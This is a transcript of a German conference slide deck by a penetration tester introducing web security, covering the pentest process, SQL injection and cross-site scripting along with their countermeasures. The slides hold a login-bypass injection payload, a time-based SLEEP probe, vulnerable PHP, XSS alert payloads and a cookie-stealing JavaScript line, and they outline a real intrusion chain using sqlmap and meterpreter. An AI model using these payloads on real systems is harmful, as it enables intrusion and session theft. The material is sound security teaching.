Web Security aus der Perspektive eines Penetration-Testers
|
|
- Ida Armbruster
- vor 7 Jahren
- Abrufe
Transkript
1 Web Security aus der Perspektive eines Penetration-Testers 14. Juni Cyber-Sicherheits-Tag Dr. Bastian Könings If you think technology can solve your security problems, then you don't understand the problems and you don't understand the technology - Bruce Schneier
2 Vorstellung Unabhängige Prüfung ganzheitliche Optimierung Leistungen der SCHUTZWERK GmbH: Prüfung Beratung Prozesse 2 /33
3 Inhalt 1 Penetration-Testing 2 Injection-Angriffe 3 Cross-Site-Scripting (XSS) 3 /33
4 Inhalt 1 Penetration-Testing 2 Injection-Angriffe 3 Cross-Site-Scripting (XSS) 4 /33
5 Penetration-Testing Penetration-Testing Ziel: möglichst weit in ein System vorzudringen Typisches Vorgehen eines Angreifers Manuelle Handarbeit nötig 1. Sammeln von Informationen Vordringen in System / Netzwerk 2. Schwachstellensuche 3. Schwachstellenausnutzung (Exploit) 5 /33
6 Penetration-Testing 1. Sammeln von Informationen IP-Ranges (z. B. über RIRs wie RIPE) Domains (DNS-Einträge) erreichbare Inhalte / URLs (z. B. über robots.txt, Suchmaschinen oder Spidern) verwendete Software (Server, Frameworks, Bibliotheken, etc.) Funktionalitäten der Webanwendung (Formulare, dynamische Inhalte, etc.) Potentielle Benutzer (z. B. Google-Suche nach -Adressen oder über soziale Netzwerke)... Aufwand abhängig vom Testverfahren: Black-Box Test Grey-Box Test White-Box Test 6 /33
7 Penetration-Testing 2. Schwachstellensuche Genaue Analyse der Webanwendung (z. B. POST- und GET- Requests, Cookie-Parameter, Quellcode, etc.) Analyse von Sicherheitsmechanismen (Session-Handling, Authentisierung, Passwortmanagement) Webbrowser HTTP(S) Proxy z. B. Burp Suite, OWASP ZAP Webserver Prüfung der Servertechnologien nach bekannten Schwachstellen (Webserver, Frameworks, Datenbanken, Programmiersprachen, etc.) 7 /33
8 Penetration-Testing Beispiel: Benutzereingaben 8 /33
9 Penetration-Testing Beispiel: Benutzereingaben Ziel: Identifikation von Schwachstellen durch Manipulation von Benutzereingaben Manuelles Verändern von POST- und GET-Parametern Automatisiertes Scannen von POST- und GET-Parametern (z. B. mit Burp Suite) Alle expliziten und impliziten Benutzereingaben stellen ein potentielles Sicherheitsrisiko dar! z. B. POST- und GET-Parameter, HTTP-Header, Cookies 9 /33
10 Penetration-Testing 2. Schwachstellenausnutzung (Exploit) Ziele der Ausnutzung einer Schwachstelle: > Umgehen der Anwendungslogik (z. B. günstiger Einkaufen) > Störung des Betriebsablaufs (Denial-of-Service) > Zugriff auf Informationen (z. B. Benutzerdaten, interne Betriebsgeheimnisse, etc.) > Installation von Backdoors (z. B. Upload einer php-backdoor, die System-Kommandos ausführen kann) > /33
11 Schwachstellenausnutzung Zwei grundsätzliche Angriffskategorien Client Side Attacks z. B. Cross-Site-Scripting (XSS) Server Side Attacks z. B. Injection 11 /33
12 Inhalt 1 Penetration-Testing 2 Injection-Angriffe 3 Cross-Site-Scripting (XSS) 12 /33
13 Injection-Angriffe Injection-Angriffe Einbetten von Übergabeparametern in Befehle oder Anfragen Command-Injection Einbetten in Systembefehle $ mycommand SQL-Injection Einbetten in Datenbankanfragen SELECT * FROM users WHERE name= 13 /33
14 Injection-Angriffe SQL-Injection <?php $user = $_POST['user']; $pass = $_POST['pass']; $query = "SELECT * FROM users WHERE user='$user' and password='$pass'"; $result = mysql_query($query);...?> Korrekte Anmeldung durch POST-Request: POST /login.php HTTP/1.1 Host: myowncloud.com user=admin&pass=topsecret Resultierende SQL-Anfrage: Beispiel: Benutzeranmeldung SELECT * FROM users WHERE user='admin' and password='topsecret' 14 /33
15 Injection-Angriffe SQL-Injection <?php $user = $_POST['user']; $pass = $_POST['pass']; $query = "SELECT * FROM users WHERE user='$user' and password='$pass'"; $result = mysql_query($query);...?> SQL-Injection in Anmeldeparameter des POST-Requests: POST /login.php HTTP/1.1 Host: myowncloud.com user=admin&pass=xy' or '1'='1 Resultierende SQL-Anfrage: Beispiel: Benutzeranmeldung SELECT * FROM users WHERE user='admin' and password='xy' or '1'='1' 15 /33
16 Injection-Angriffe Identifizierung von SQL-Injection-Schwachstellen Fehlerbasiert > z. B. Fehlerausgabe in HTML-Dokument Incorrect syntax near 'injectiontest'. Unclosed quotation mark before the character string ' Boolean-basiert > Valide SQL-Injection führt zu anderem Ergebnis > z. B. SQL-Injection führt zu erfolgreicher Anmeldung Zeitbasiert > Valide SQL-Injection führt zu veränderten Antwortzeiten ProductID=1' OR SLEEP(25)=0 LIMIT /33
17 Injection-Angriffe Angriffsziele Zugriff auf Informationen > z. B. Benutzerdaten (Passwörter, Kreditkartendaten, etc.) Manipulation > z. B. Änderung von Preisen Weiteres Eindringen in System(e) > durch Command-Injection > Ausführen von Systembefehlen durch SQL-Injections (z. B. möglich bei Microsoft SQL Server) Anlegen eines neuen Benutzers / Administrators Anmeldung via SSH oder Remote Desktop 17 /33
18 Injection-Angriffe Ablauf eines Angriffs aus der Praxis Interner Penetration-Test Zeitbasierte SQL-Injection Schwachstelle Scannen der Infrastruktur (erreichbare Systeme / Dienste) z. B. via nmap interne Webseite eines Inventarsystems Auslesen von Anmeldedaten aus MySQL-Datenbank via sqlmap 18 /33
19 Injection-Angriffe Ablauf eines Angriffs aus der Praxis Interner Penetration-Test Anlegen eines lokalen Admins und Anmeldung per Remote Desktop Wiederverwendung eines Passwortes für Admin-Account einer MSSQL-Datenbank (erlaubt Ausführung von Systembefehlen) Auslesen von Anmeldedaten aus MySQL-Datenbank via sqlmap 19 /33
20 Injection-Angriffe Ablauf eines Angriffs aus der Praxis Interner Penetration-Test Anlegen eines lokalen Admins und Anmeldung per Remote Desktop Wiederverwendung eines Passwortes für Admin-Account einer MSSQL-Datenbank (erlaubt Ausführung von Systembefehlen) Auslesen von Klartext-Passwörtern aus Arbeitsspeicher (via meterpreter) Anmeldung als Admin an Domain-Controller (erlaubt volle Kontrolle) 20 /33
21 Injection-Angriffe Gegenmaßnahmen Verwendung sicherer APIs mit parametrisierten Schnittstellen > z. B. Prepared Statements bei SQL <?php // prepare and bind $stmt = $conn->prepare("insert INTO users (name, ) VALUES (?,?)"); $stmt->bind_param("ss", $name, $ );?> Filterung oder Escapen nicht erlaubter Zeichen > Zahlreiche existierende Bibliotheken mit verschiedenen Funktionen (z. B. OWASP Enterprise Security API) White-List von erlaubten Eingaben 21 /33
22 Inhalt 1 Penetration-Testing 2 Injection-Angriffe 3 Cross-Site-Scripting (XSS) 22 /33
23 Cross-Site-Scripting (XSS) Cross-Site-Scripting: Script-Code (z. B. JavaScript) eines Angreifers wird ungefiltert in Webseite eingebunden > Erlaubt einem Angreifer die Ausführung von Script-Code im Browser eines Benutzers Angreifer < /> < /> Zwei wesentliche XSS-Arten > Stored XSS > Reflected XSS 23 /33
24 Cross-Site-Scripting (XSS) Stored XSS Benutzer 1 Angreifer Webserver Beispiel: Kommentarfelder HTML-Ausgabe: Benutzer 2... <p>comment of <b>bad Guy</b>:<br/> <script>alert('xss');</script> </p> /33
25 Cross-Site-Scripting (XSS) Reflected XSS Angreifer Webserver Script-Code in Übergabeparameter eines HTTP-Requests (z. B. GET oder POST) wird ungefiltert in HTTP-Response eingebunden Ahnung HTML-Ausgabe: <p>die Suche nach <b>keine Ahnung</b> ergab keine Treffer</p> 25 /33
26 Cross-Site-Scripting (XSS) Reflected XSS Angreifer Webserver Script-Code in Übergabeparameter eines HTTP-Requests (z. B. GET oder POST) wird ungefiltert in HTTP-Response eingebunden HTML-Ausgabe: <p>die Suche nach <b><script>alert('xss');</script></b> ergab keine Treffer</p> 26 /33
27 Cross-Site-Scripting (XSS) Reflected XSS Angreifer Webserver Wie Script bei anderen Benutzern ausführen? Link Angreifer Benutzer Webserver 27 /33
28 Cross-Site-Scripting (XSS) Angriffsziele Stehlen von Session-Tokens in Cookies > durch Auslesen der Java-Script-Variable document.cookie var i=new Image(); i.src=" + document.cookie; Phishing > durch Manipulation dargestellter Inhalte (z. B. Login-Feld, das Benutzername und Passwort an Angreifer weiterleitet) Ausnutzen von Browser-Schwachstellen > durch Einbettung schadhafter Anwendungen (z. B. Java, Flash) 28 /33
29 Cross-Site-Scripting (XSS) Weitere Möglichkeiten Mitschneiden von Tastatureingaben Auslesen der Zwischenablage Auslesen der Such-History Auslesen kürzlich verwendeter Anwendungen Portscanning im Netz des Client Angriffe auf Hosts im Netz des Client 29 /33
30 Cross-Site-Scripting (XSS) Gegenmaßnahmen Filterung oder Escapen nicht erlaubter Zeichen > existierende Bibliotheken (z. B. OWASP Enterprise Security API) > z. B. Verwendung von HTML-Encoding: Zeichen & & < < > > " " ' ' HTML-Encoded Limitierung der Zeichenlänge von Übergabeparametern Whitelisting erlaubter Ein- und Ausgabeparameter 30 /33
31 Cross-Site-Scripting (XSS) Gegenmaßnahmen Verhinderung von Cookie-Stealing durch HttpOnly Flag > Zusätzliches Flag im Set-Cookie HTTP Response Header HTTP/ OK Set-Cookie: sessionid=y29va2lligf1zmjhdq==; HttpOnly > verhindert client-seitiges Auslesen des Cookies durch Script-Sprachen (falls der Browser dies unterstützt) 31 /33
32 Fazit Web Security Nur kleiner Einblick Injection-Angriffe Cross-Site-Scripting (XSS) Take-Home-Message: Alle expliziten und impliziten Benutzereingaben stellen ein potentielles Sicherheitsrisiko dar! 32 /33
33 Für Fragen stehen wir Ihnen gerne zur Verfügung SCHUTZWERK GmbH Pfarrer-Weiß-Weg Ulm Phone Fax info@schutzwerk.com 33 /33
Sicherheit von Webapplikationen Sichere Web-Anwendungen
Sicherheit von Webapplikationen Sichere Web-Anwendungen Daniel Szameitat Agenda 2 Web Technologien l HTTP(Hypertext Transfer Protocol): zustandsloses Protokoll über TCP auf Port 80 HTTPS Verschlüsselt
MehrAktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen
FAEL-Seminar Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte
Mehritsc Admin-Tag OWASP Top 10 Tobias Ellenberger COO & Co-Partner OneConsult GmbH 2013 OneConsult GmbH www.oneconsult.com
itsc Admin-Tag OWASP Top 10 Tobias Ellenberger COO & Co-Partner OneConsult GmbH 13.03.2013 Agenda Vorstellung Open Web Application Security Project (OWASP) Die OWASP Top 10 (2013 RC1) OWASP Top 3 in der
MehrWeb Application Security: SQL-injection, Cross Site Scripting -- w3af
Web Application Security: SQL-injection, Cross Site Scripting -- w3af 1 Web 2.0 Application und Angriffspunkte Grundlagen: SQL SQL-injection Cross Site Scripting Web Application Scans mit w3af 2 Eine Web
MehrAktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen
Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Dr. Marc Rennhard Institut für angewandte Informationstechnologie Zürcher Hochschule Winterthur marc.rennhard@zhwin.ch Angriffspunkt
MehrPHP-5-Zertifizierung. Block 12 Security.
PHP-5-Zertifizierung Block 12 Security Allgemeine Regeln Alle Eingaben (von außen) sind (potenziell) böse Eingaben filtern/validieren Ausgaben escapen Trauen Sie nichts von außen! GET-/POST-Daten Cookies
MehrAktuelle Sicherheitsprobleme im Internet
Herbst 2014 Aktuelle Sicherheitsprobleme im Internet Wirtschaftsinformatik: 5. Semester Dozenten: Rainer Telesko / Martin Hüsler Fachhochschule Nordwestschweiz FHNW / Rainer Telesko - Martin Hüsler 1 Inhalt
MehrWelche Gefahren gehen vom Firmenauftritt im Internet aus?
Die Webseite als Eintrittspunkt Welche Gefahren gehen vom Firmenauftritt im Internet aus? Bekannt gewordene Schwachstellen & Angriffe Bekannt gewordene Schwachstellen & Angriffe Quelle: http://www.vulnerability-db.com/dev/index.php/2014/02/06/german-telekom-bug-bounty-3x-remote-vulnerabilities/
MehrWALL&KOLLEGEN RECHTSANWÄLTE AVVOCATI BARRISTER-AT-LAW MÜNCHEN INNSBRUCK BOZEN
WALL&KOLLEGEN RECHTSANWÄLTE AVVOCATI BARRISTER-AT-LAW MÜNCHEN INNSBRUCK BOZEN Die 7 häufigsten Fehler im IT-Security- Management bei Webanwendungen (nach OWASP) München, 11.10.2011 c1 Folie 3 c1 Ich habe
MehrSichere Webanwendungen brauchen sichere Infrastrukturen! Reicht das in der Realität aus?
Sichere Webanwendungen brauchen sichere Infrastrukturen! Reicht das in der Realität aus? Ziel dieses Vortrags Thema Sicherheit von Webanwendungen greifbar machen Praxisorientierte Einführung in aktuelle/zukünftige
MehrSecurity-Webinar. September Dr. Christopher Kunz, filoo GmbH
Security-Webinar September 2015 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ Vorträge auf Konferenzen _
MehrSchwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus?
Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus? Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte
MehrHacker-Methoden in der IT- Sicherheitsausbildung. Dr. Martin Mink
Hacker-Methoden in der IT- Sicherheitsausbildung Dr. Martin Mink Hacker-Angriffe 3.11.2010 Hacker-Methoden in der IT-Sicherheitsausbildung Dr. Martin Mink 2 Typische Angriffe auf Web- Anwendungen SQL Injection
MehrWeb Hacking - Angriffe und Abwehr
Web Hacking - Angriffe und Abwehr UNIX-Stammtisch 31. Januar 2012 Frank Richter Holger Trapp Technische Universität Chemnitz Universitätsrechenzentrum Motivation (1): Für uns Lehrveranstaltung: Techniken
MehrDestructive AJAX. Stefan Proksch Christoph Kirchmayr
Destructive AJAX Stefan Proksch Christoph Kirchmayr AJAX-Einführung Asynchronous JavaScript And XML Clientseitiger JavaScript-Code Asynchrone Kommunikation XML DOM Klassisches Client-Server Modell AJAX-Modell
MehrSecure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011
Secure Coding & Live Hacking von Webapplikationen Conect Informunity 8.3.2011 Dr. Ulrich Bayer Security Research Sicherheitsforschung GmbH Motivation Datendiebstahl über (Web)-Applikationen passiert täglich
MehrIT-Sicherheit. Sicherheit von Webanwendungen 7. Januar 2011
IT-Sicherheit Sicherheit von Webanwendungen 7. Januar 2011 Prof. Dr. Matthew Smith Hergen Harnisch smith@rrzn.uni-hannover.de harnisch@rrzn.uni-hannover.de M.Smith/H.Harnisch, LÜ IT-Sicherheit, 7. Januar
MehrHACK YOUR OWN WEBSITE! WEB SECURITY IM SELBSTVERSUCH. Stefan Schlott @_skyr
HACK YOUR OWN WEBSITE! WEB SECURITY IM SELBSTVERSUCH Stefan Schlott @_skyr DIE OWASP TOP-10 Alpha und Omega der Security-Talks :-) TOP 10 VON 2013 1. Injection 2. Broken Authentication/Session Management
MehrHACK YOUR OWN WEBSITE! WEB SECURITY IM SELBSTVERSUCH
HACK YOUR OWN WEBSITE! WEB SECURITY IM SELBSTVERSUCH Dr. Stefan Schlott, BeOne Stuttgart GmbH ABOUT.TXT Stefan Schlott, BeOne Stuttgart GmbH Java-Entwickler, Scala-Enthusiast, Linux-Jünger Seit jeher begeistert
MehrIntegration von UIS-Webdiensten
Integration von UIS-Webdiensten neue Möglichkeiten durch Web 2.0 basierte Technologien Clemens Düpmeier, Werner Geiger, Claudia Greceanu (duepmeier, geiger, greceanu@iai.fzk.de) Institut für Angewandte
MehrPHP-Schwachstellen und deren Ausnutzung
PHP-Schwachstellen und deren Ausnutzung 44. DFN Betriebstagung / 7. Februar 2006 DFN-CERT Services GmbH Jan Kohlrausch / CSIRT Gliederung Grundlagen HTTP und PHP Anatomie typischer Schwachstellen in PHP-Skripten
Mehr1a) SQL Stored Procedure via IDs
1a) SQL Stored Procedure via IDs Erstellen Sie analog zu Aufgabe 2d) des ersten Übungsblatts eine SQL Stored Procedure, welche den Freundschaftsgrad zweier Benutzer eines sozialen Netzwerks aktualisiert.dazu
Mehrvii Inhaltsverzeichnis 1 Einleitung 1
vii 1 Einleitung 1 1.1 Über dieses Buch................................. 1 1.2 Was ist Sicherheit?............................... 3 1.3 Wichtige Begriffe................................ 4 1.4 Sicherheitskonzepte..............................
MehrEinführung in Web-Security
Einführung in Web-Security Alexander»alech«Klink Gulaschprogrammiernacht 2013 Agenda Cross-Site-Scripting (XSS) Authentifizierung und Sessions Cross-Site-Request-Forgery ([XC]SRF) SQL-Injections Autorisierungsprobleme
MehrMultimedia im Netz Wintersemester 2013/14. Übung 02 (Hauptfach)
Multimedia im Netz Wintersemester 2013/14 Übung 02 (Hauptfach) Ludwig-Maximilians-Universität München Multimedia im Netz WS 2013/14 - Übung 2-1 PHP und MySQL Es werden mehrere APIs von PHP angeboten um
MehrIHK: Web-Hacking-Demo
sic[!]sec, Achim Hoffmann IHK: Web-Hacking-Demo, Bayreuth 1. April 2014 1 von 34 IHK: Web-Hacking-Demo Achim Hoffmann Achim.Hoffmann@sicsec.de Bayreuth 1. April 2014 sic[!]sec GmbH spezialisiert auf Web
Mehr[14-04] Huseby, Sverry: Sicherheitsrisiko Web-Anwendung. dpunkt, 2004
Literatur I [14-01] Power, Richard: Attacken im Web. Markt+Technik, 2001 [14-02] Kunz, Christopher; Esser, Stefan: PHP-Sicherheit. dpunkt, 3. Auflage, 2008 [14-03] Ziegler, Paul Sebastian: Cross-Site Scripting.
MehrOWASP Stammtisch München Sep 2014 XSS und andere Sicherheitslücken aus der Perspektive des Programmcodes
OWASP Stammtisch München Sep 2014 XSS und andere Sicherheitslücken aus der Perspektive des Programmcodes 1 XSS: Cross-Site Scripting 1.) Es gelangen Daten in den Web-Browser, die Steuerungsinformationen
MehrSoftwaresicherheit. Eine Präsentation von Benedikt Streitwieser und Max Göttl. Einführung Kryptographie und IT-Sicherheit
Softwaresicherheit Eine Präsentation von Benedikt Streitwieser und Max Göttl Einführung Kryptographie und IT-Sicherheit Gliederung Einleitung: Was ist Softwaresicherheit Populäre Beispiele Anforderungen
MehrHACK THAT WEBSITE! WEB SECURITY IM SELBSTVERSUCH
HACK THAT WEBSITE! WEB SECURITY IM SELBSTVERSUCH Dr. Stefan Schlott, BeOne Stuttgart GmbH ABOUT.TXT Stefan Schlott, BeOne Stuttgart GmbH Java-Entwickler, Scala-Enthusiast, Linux-Jünger Seit jeher begeistert
MehrPortal zur Verwaltung von Wohngemeinschaftsfinanzen mit dem Web-Framework Django
Portal zur Verwaltung von Wohngemeinschaftsfinanzen mit dem Web-Framework Django 29. Januar 2018 Yannick Linke 2018 Yannick Linke/FH Aachen Portal zur Verwaltung von Wohngemeinschaftsfinanzen mit Django
MehrSicherheitsanalyse der Private Cloud Interfaces von
Sicherheitsanalyse der Private Cloud Interfaces von Emanuel Durmaz Ruhr-Universität Bochum 1 Emanuel Durmaz 10/16: Bachelor of Science IT-Sicherheit, Ruhr-Universität Bochum Thesis: Sicherheitsanalyse
MehrOWASP Top 10. im Kontext von Magento. Mittwoch, 21. November 12
OWASP Top 10 im Kontext von Magento 1 Ich Fabian Blechschmidt (@Fabian_ikono) blechschmidt@fabianblechschmidt.de PHP seit 2004 Freelancer seit 2008 Magento seit 2011 Certified Magento Developer spielt
Mehr14.05.2013. losgeht s
losgeht s 1 Agenda erläutern 2 Warum jetzt zuhören? 3 BSI-Quartalsbericht 4/2010 Die gefährlichsten Schwachstellen in Webauftritten Häufig wurden SQL-Injection(Weiterleitung von SQL-Befehlen an die Datenbank
MehrPHP-Sicherheit. PHP/MySQL-Webanwendungen sicher programmieren. Ifl dpunkt.verlag. Christopher Kunz Stefan Esser Peter Prochaska
Christopher Kunz Stefan Esser Peter Prochaska PHP-Sicherheit PHP/MySQL-Webanwendungen sicher programmieren 2., aktualisierte und überarbeitete Auflage Ifl dpunkt.verlag Inhaltsverzeichnis 1 Einleitung
MehrSicherheit in Webanwendungen CrossSite, Session und SQL
Sicherheit in Webanwendungen CrossSite, Session und SQL Angriffstechniken und Abwehrmaßnahmen Mario Klump Die Cross-Site -Familie Die Cross-Site-Arten Cross-Site-Scripting (CSS/XSS) Cross-Site-Request-Forgery
MehrIT-Sicherheit auf dem Prüfstand Penetrationstest
IT-Sicherheit auf dem Prüfstand Penetrationstest Penetrationstest IT-Sicherheit auf dem Prüfstand Risiken erkennen und Sicherheitslücken schließen Zunehmende Angriffe aus dem Internet haben in den letzten
MehrFehlende Input-Filterung. Klaus Kusche
Fehlende Input-Filterung Klaus Kusche Grund-Problem Benutzer-Eingaben (= meist Eingaben in Web-Formularen, aber auch Commandline- oder Dialog-Inputs, Dateien und Netz-Requests,...) werden nicht gefiltert
MehrChristopher Kunz Peter Prochaska. PHP-Sicherheit. PHP/MySQL-Webanwendungen sicher programmieren. dpunkt.verlag
Christopher Kunz Peter Prochaska PHP-Sicherheit PHP/MySQL-Webanwendungen sicher programmieren dpunkt.verlag 1 Einleitung 1 1.1 Über dieses Buch 1 1.2 Was ist Sicherheit? 3 1.3 Wichtige Begriffe 4 1.4 Sicherheitskonzepte
MehrPHP-(Un-)Sicherheit. Hacker-Seminar Herbstsemester 2006 Laboratory for Dependable Distributed Systems Universität Mannheim.
Hacker-Seminar Herbstsemester 2006 Laboratory for Dependable Distributed Systems Universität Mannheim Tim Weber 9. November 2006 Übersicht 1. Die Sprache PHP 2. Sicherheitslücken und Angriffsszenarien
MehrEntwicklung einer Webseite zur Verwaltung von Prüfungsterminen
Staatliche Fachschule für Mechatronik- und Elektrotechnik Entwicklung einer Webseite zur Verwaltung von Prüfungsterminen von Wagemann Andreas 3. Januar 2018 Entwicklungsarbeit Staatliche Fachschule für
MehrSQL-Injection. Seite 1 / 16
SQL-Injection Seite 1 / 16 Allgemein: SQL (Structured Query Language) Datenbanksprache zur Definition von Datenstrukturen in Datenbanken Bearbeiten und Abfragen von Datensätzen Definition: SQL-Injection
MehrNeues aus dem DFN-CERT. 48. DFN-Betriebstagung - Forum Sicherheit 26. Februar 2008 Andreas Bunten, DFN-CERT
Neues aus dem DFN-CERT 48. DFN-Betriebstagung - Forum Sicherheit 26. Februar 2008 Andreas Bunten, DFN-CERT Agenda Neuigkeiten zum Thema Automatische Warnmeldungen Aktuelle Angriffe und Schwachstellen Das
MehrNetzwerksicherheit Übung 9 Websicherheit
Netzwerksicherheit Übung 9 Websicherheit David Eckhoff, Tobias Limmer, Christoph Sommer Computer Networks and Communication Systems Dept. of Computer Science, University of Erlangen-Nuremberg, Germany
MehrWEBINAR: HTTPS, ZERTIFIKATE, GRÜNE URLS. Trügerische Sicherheit im Internet
WEBINAR: HTTPS, ZERTIFIKATE, GRÜNE URLS Trügerische Sicherheit im Internet HERZLICH WILLKOMMEN Die Moderatoren Andreas Krenz Client Relationship Manager Fragen über Chat Frank Pöhler Senior Consultant
MehrHochschule Darmstadt Fachbereich Informatik. Entwicklung webbasierter Anwendungen
Hochschule Darmstadt Fachbereich Informatik Entwicklung webbasierter Anwendungen 1 Entwicklung webbasierter Anwendungen, SS2016, Stefan Zander / Maximilian Madl/ Thomas Sauer 14.06.2016 Hochschule Darmstadt
MehrSession Management und Cookies
LMU - LFE Medieninformatik Blockvorlesung Web-Technologien Wintersemester 2005/2006 Session Management und Cookies Max Tafelmayer 1 Motivation HTTP ist ein zustandsloses Protokoll Je Seitenaufruf muss
MehrHochschule Darmstadt Fachbereich Informatik
Hochschule Darmstadt Fachbereich Informatik Entwicklung webbasierter Anwendungen 1 Entwicklung webbasierter Anwendungen, WS2015/2016, Christopher Dörge / David Müller 11.01.2016 Hochschule Darmstadt Fachbereich
MehrPHP-Sicherheit. PHP/MySQL-Webanwendungen sicher programmieren. von Christopher Kunz, Stefan Esser, Peter Prochaska. überarbeitet
PHP-Sicherheit PHP/MySQL-Webanwendungen sicher programmieren von Christopher Kunz, Stefan Esser, Peter Prochaska überarbeitet PHP-Sicherheit Kunz / Esser / Prochaska schnell und portofrei erhältlich bei
MehrV10 I, Teil 2: Web Application Security
IT-Risk-Management V10 I, Teil : Web Application Security Tim Wambach, Universität Koblenz-Landau Koblenz, 9.7.015 Agenda Einleitung HTTP OWASP Security Testing Beispiele für WebApp-Verwundbarkeiten Command
Mehrvii Inhaltsverzeichnis 1 Einleitung 1
vii 1 Einleitung 1 1.1 Über dieses Buch................................. 1 1.2 Was ist Sicherheit?............................... 4 1.3 Wichtige Begriffe................................ 5 1.4 Sicherheitskonzepte..............................
MehrAktuelle Angriffstechniken. Steffen Tröscher cirosec GmbH, Heilbronn
Aktuelle Angriffstechniken Steffen Tröscher cirosec GmbH, Heilbronn Gliederung Angriffe auf Webanwendungen Theorie und Live Demonstrationen Schwachstellen Command Injection über File Inclusion Logische
MehrIT-Sicherheit Angriffsziele und -methoden Teil 2
Karl Martin Kern IT-Sicherheit Angriffsziele und -methoden Teil 2 http://www.xkcd.com/424/ Buffer Overflows 2 Buffer Overflows Ausnutzen unzureichender Eingabevalidierung Begrenzter Speicherbereich wird
MehrCASE STUDY SICHERES ONLINEBANKING
CASE STUDY SICHERES ONLINEBANKING Spätestens seit den Enthüllungen von Edward Snowden ist IT-Sicherheit ein nicht nur in den Medien intensiv diskutiertes Thema. Auch die Bundesregierung will mit dem in
MehrHACK THAT WEBSITE! WEB SECURITY IM SELBSTVERSUCH
HACK THAT WEBSITE! WEB SECURITY IM SELBSTVERSUCH Dr. Stefan Schlott, BeOne Stuttgart GmbH ABOUT.TXT Stefan Schlott, BeOne Stuttgart GmbH Java-Entwickler, Scala-Enthusiast, Linux-Jünger Seit jeher begeistert
MehrDatenbank-basierte Webserver
Datenbank-basierte Webserver Datenbank-Funktion steht im Vordergrund Web-Schnittstelle für Eingabe, Wartung oder Ausgabe von Daten Datenbank läuft im Hintergrund und liefert Daten für bestimmte Seiten
MehrInformationstechnik & System-Management SQL INJECTION. Selbstgemachte Sicherheitslücken. SQL-Injection ITSB2006 Michael Donabaum
SQL INJECTION Selbstgemachte Sicherheitslücken Beschreibung SQL-Injection SQL-Einschleusung Ausnutzen von Sicherheitslücken in Zusammenspiel mit SQL-Datenbanken Mangelnde Maskierung von Metazeichen \ ;
MehrZusammenfassung Web-Security-Check ZIELSYSTEM
Zusammenfassung Web-Security-Check ZIELSYSTEM für KUNDE (nachfolgend Auftraggeber genannt) von secudor GmbH Werner-von-Siemensstraße 6 Gebäude 9 86159 Augsburg (nachfolgend Auftragnehmer genannt) Inhalt
MehrAdvanced Web Hacking. Matthias Luft Security Research mluft@ernw.de
Advanced Web Hacking Matthias Luft Security Research mluft@ernw.de ERNW GmbH. Breslauer Str. 28. D-69124 Heidelberg. www.ernw.de 6/23/2010 1 ERNW GmbH Sicherheitsdienstleister im Beratungs- und Prüfungsumfeld
MehrRuby on Rails Sicherheit. Heiko Webers 42@rorsecurity.info
Ruby on Rails Sicherheit Heiko Webers 42@rorsecurity.info Heiko Webers Ruby On Rails Security Project: www.rorsecurity.info E-Book Ruby On Rails Security Ruby On Rails Security Audits Webanwendungen Trends
MehrWhen your browser turns against you Stealing local files
Information Security When your browser turns against you Stealing local files Eine Präsentation von Alexander Inführ whoami Alexander Inführ Information Security FH. St Pölten Internet Explorer Tester
MehrWeb-Sicherheit: Kein fauler Zauber?! Kai Jendrian. <Seminartitel> <Seminartitel>
Web-Sicherheit: Kein fauler Zauber?! Security Consulting GmbH, Karlsruhe Seite 1 Security Consulting GmbH, Karlsruhe Seite 2 Security Consulting GmbH, Karlsruhe Seite 3 Security
MehrSicherheit von Ruby On Rails Heiko Webers Heiko Webers Ruby On Rails Security Project: www.rorsecurity.info Autor von Ruby On Rails Security, ab August 2007 bei der OWASP Ruby On Rails Beratung mit Sicherheit
MehrAnleitung zur Integration der /data.mill API in SAP Java Applikationen
Anleitung zur Integration der /data.mill API in SAP Java Applikationen Inhalt 1. Anlage einer HTTP Destination 1 1.1. Anmelden an SAP Cloud Platform 1 1.2. Destination Konfiguration 3 1.3. Eintragen der
MehrSichere Datenbankanfragen
Vorstand Sichere Datenbankanfragen OpenText WebSiteManagement (Delivery Server) Axel Reinhardt Agenda Was ist SQL-Injection? Beispiel eines Bestellprozesses Vorgehen eines Angreifers Härten der Web-Seite
MehrWie sichert man APEX-Anwendungen gegen schädliche Manipulationen und unerwünschte Zugriffe ab?
APEX aber sicher Wie sichert man APEX-Anwendungen gegen schädliche Manipulationen und unerwünschte Zugriffe ab? Carola Berzl BASEL BERN BRUGG GENF LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR.
MehrHeaders, Websockets + More: Webserver und Webapp-Sicherheit im Jahre 2014
Headers, Websockets + More: Webserver und Webapp-Sicherheit im Jahre 2014 Markus Manzke SLAC 2014 / Berlin 13.03.2014 "If you spend more on coffee than on IT security, then you will be hacked." -- Richard
MehrCarsten Eilers www.ceilers-it.de. Pentesters Toolbox
Carsten Eilers www.ceilers-it.de Pentesters Toolbox Vorstellung Berater für IT-Sicherheit Autor PHP Magazin, Entwickler Magazin Buch Ajax Security www.ceilers-news.de und anderes... Schwachstellen-Datenbank
MehrGrundlagen von Datenbanken SS 2010 Kapitel 8: Datenbank-Einbettung in Programmiersprachen Prof. Dr. Stefan Böttcher Universität Paderborn
Grundlagen von Datenbanken SS 2010 Kapitel 8: Datenbank-Einbettung in Programmiersprachen Prof. Dr. Stefan Böttcher Universität Paderborn Grundlagen von Datenbanken - SS 2010 - Prof. Dr. Stefan Böttcher
MehrIT Solutions. AnyConnect unter Linux (Ubuntu 14.04) Gültige VPN Accounts:
IT Solutions AnyConnect unter Linux (Ubuntu 14.04) Gültige VPN Accounts: UserID@tuwien.ac.at UserID@vpn.tuwien.ac.at UserID@student.tuwien.ac.at Es stehen zwei Profile zur Verfügung. Diese werden beim
MehrCarsten Eilers ceilers-it.de. Schwachstellen-Scans im Web 2.0
